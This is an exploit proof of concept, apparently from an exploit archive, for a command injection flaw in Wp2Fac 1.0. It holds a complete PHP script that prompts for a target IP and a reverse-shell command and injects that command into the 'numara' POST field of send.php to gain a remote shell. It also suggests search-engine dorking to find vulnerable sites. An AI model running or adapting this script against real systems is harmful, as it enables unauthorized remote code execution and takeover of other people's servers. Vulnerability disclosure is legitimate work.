=============================================================================================================================================
| # Title     : Wp2Fac 1.0 PHP COde Injection Vulnerability                                                                                 |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
| # Vendor    : https://github.com/metinyesil/wp2fac                                                                                        |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: Send a POST request using PHP to execute commands on the target server.

   (Related : https://packetstorm.news/files/id/174555/ Related CVE numbers:  ) .
	
[+] save code as poc.php.

[+] Usage: php script.php

[+] PayLoad :


<?php

function send_post_request($host, $revshell) {
    $url = "http://$host/send.php";
    $headers = [
        "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0",
        "Accept: */*",
        "Accept-Language: en-US,en;q=0.5",
        "Accept-Encoding: gzip, deflate",
        "Content-Type: application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With: XMLHttpRequest",
        "Origin: http://$host",
        "Connection: close",
        "Referer: http://$host/"
    ];

    $data = [
        "numara" => "1234567890 & $revshell &;"
    ];

    $options = [
        "http" => [
            "header" => implode("\r\n", $headers),
            "method" => "POST",
            "content" => http_build_query($data)
        ]
    ];

    $context = stream_context_create($options);
    $response = file_get_contents($url, false, $context);

    return $response;
}

$host = readline("Target IP: ");
$revshell = readline("Reverse Shell Command: ");

echo "Check your listener!\n";

echo send_post_request($host, $revshell);

?>






Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================